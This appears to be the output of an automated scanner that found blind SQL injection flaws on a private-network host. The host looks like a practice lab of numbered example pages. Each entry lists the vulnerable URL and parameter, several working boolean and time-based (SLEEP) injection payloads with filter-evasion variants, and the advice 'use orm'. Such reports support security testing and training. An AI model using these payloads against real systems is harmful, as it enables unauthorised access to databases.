Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php 
VulnName: bsqli
Query: {'name': "root'\tand\t'44819'='44819"}
payload: '	and	'44819'='44819
'	and	'54739'='54739
'	or	14345=14345#
'	and	'42470'='42471
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example2.php 
VulnName: bsqli
Query: {'name': "root'\tand\t'44819'='44819"}
payload: '	and	'44819'='44819
'	and	'54739'='54739
'	or	14345=14345#
'	and	'42470'='42471
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example3.php 
VulnName: bsqli
Query: {'name': "root'/**/and/**/'74368'='74368"}
payload: '/**/and/**/'74368'='74368
'/**/and/**/'71678'='71678
'/**/or/**/36074=36074#
'/**/and/**/'46388'='46389
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example4.php 
VulnName: bsqli
Query: {'id': '2\tand\t89642=89642'}
payload: 	and	89642=89642
	and	19370=19370
	or	8757=8757#
	and	96912=96913
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example5.php 
VulnName: bsqli
Query: {'id': '2\tand\t89642=89642'}
payload: 	and	89642=89642
	and	19370=19370
	or	8757=8757#
	and	96912=96913
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example6.php 
VulnName: bsqli
Query: {'id': "2'+and+'20569'='20569"}
payload: '+and+'20569'='20569
'+and+'35794'='35794
'+or+7753=7753#
'+and+'70585'='70586
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example7.php 
VulnName: bsqli
Query: {'id': '2\nand\n27016=27016'}
payload: 
and
27016=27016

and
7410=7410

or
34915=34915#

and
40365=40366
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example8.php 
VulnName: bsqli
Query: {'order': 'name'}
payload: ` or SLEEP(3);-- 
advice: use orm
---
---
URL:http://192.168.42.133/sqli/example9.php 
VulnName: bsqli
Query: {'order': 'name'}
payload:  or SLEEP(3);-- 
advice: use orm
---
---
URL:http://192.168.42.133/xml/example2.php 
VulnName: bsqli
Query: {'name': "hacker'+and+'20569'='20569"}
payload: '+and+'20569'='20569
'+and+'35794'='35794
'+or+7753=7753#
'+and+'70585'='70586
advice: use orm
---